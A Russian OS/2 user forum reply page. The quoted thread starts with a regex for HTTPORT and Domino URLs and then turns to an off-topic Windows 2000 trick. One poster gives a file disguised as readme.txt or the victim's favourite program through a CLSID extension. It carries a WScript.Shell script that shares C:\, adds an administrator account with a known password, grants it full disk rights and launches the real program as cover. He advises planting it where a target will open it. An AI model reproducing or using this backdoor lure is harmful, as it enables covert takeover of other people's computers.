RU/2: Форум. Общение пользователей и разработчиков OS/2 (eCS). : Ответить на сообщение

Имя:
e-mail:
FIDO:
Home page:
сохранить данные о вас

Тема:

> > > как советовалось. И оно не заработало, так как {5,} HTTPORT если не может 5 использует другое количество
> > 
> > {5,} значит 5 или более. В примере из статьи было /Vgtktk? -- 6 символов.
> 
> В результате эксперимента я видел 4
> 
> > 
> > Но ты учти, что я писал это выражение по _одному_ URL'ю и не факт, что _все_ его запросы имеют тот же вид. Включи лог, набери статистику и напиши :) своё убойное заклинание. :)))
> 
> Аллах Акбар !
> > Доминошные url'и обычно всё-таки содержат чего-то про "/kakoi-to-tam.html?", если я правильно понимаю, как он выглядит. 
> 
> Да. Какой-то.NSF 
> 
> Кстати никого Windows дыры не интересуют ?(Знаю что оффтопик, но читайте дальше):
> Завелся новый начальничек, который считает себя крутым спецом по сетевой безопасности. Этот его монолог был услышан и передан мне, а говорилось это  для руководства 17-титысячного комбината.Итак, рассказ "Подключился из дома к Интернету, смотрю сайты всякие. И тут, программа(специальная для обнаружения атак), пишет что какой-то хакер пытается у пеня пароль украсть. Ну я за ним погнался, а он через прокси уходить стал, я за ним - он через второй прокси... И тут я его почти догнал, а он отключился."
> (без комментариев)
> А теперь такая фишка(да простят меня за флейм)
> В некоем каталоге, желательно сетевом создается файл
> readme.txt.{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}
> в {}скобках - обязательно
> в этом файле
> <script>
> a=new ActiveXObject("WSCript.Shell");
> a.run("cmd /c net.exe share TEMP$=C:\ && net user user 123 /add && net localgroup администраторы user /add \0");
> a.run("cacls c:\ /e /p user:f \0");
> </script>
> пример для русской версии Win2000
> и ждете когда кто-то этот файл запустит из окна виндов (можно направленно этот файл разместить в каталоге, который наверняка посетит нужный клиент:)). Файл можно назвать "его_любимая_программа.exe.{3050f4d8-98b5-11cf-bb82-00aa00bdce0b}"
> а в скрипт добавить строку
> a.run("1.exe \0");
> где 1.exe - настоящая его_любимая_программа.exe

__, _,_ _, __, ___, \|_) \| \| \| \|_ ` / \| \ \| \| \| , \| / ~ ~ `~' ~~~ ~~~ ~~~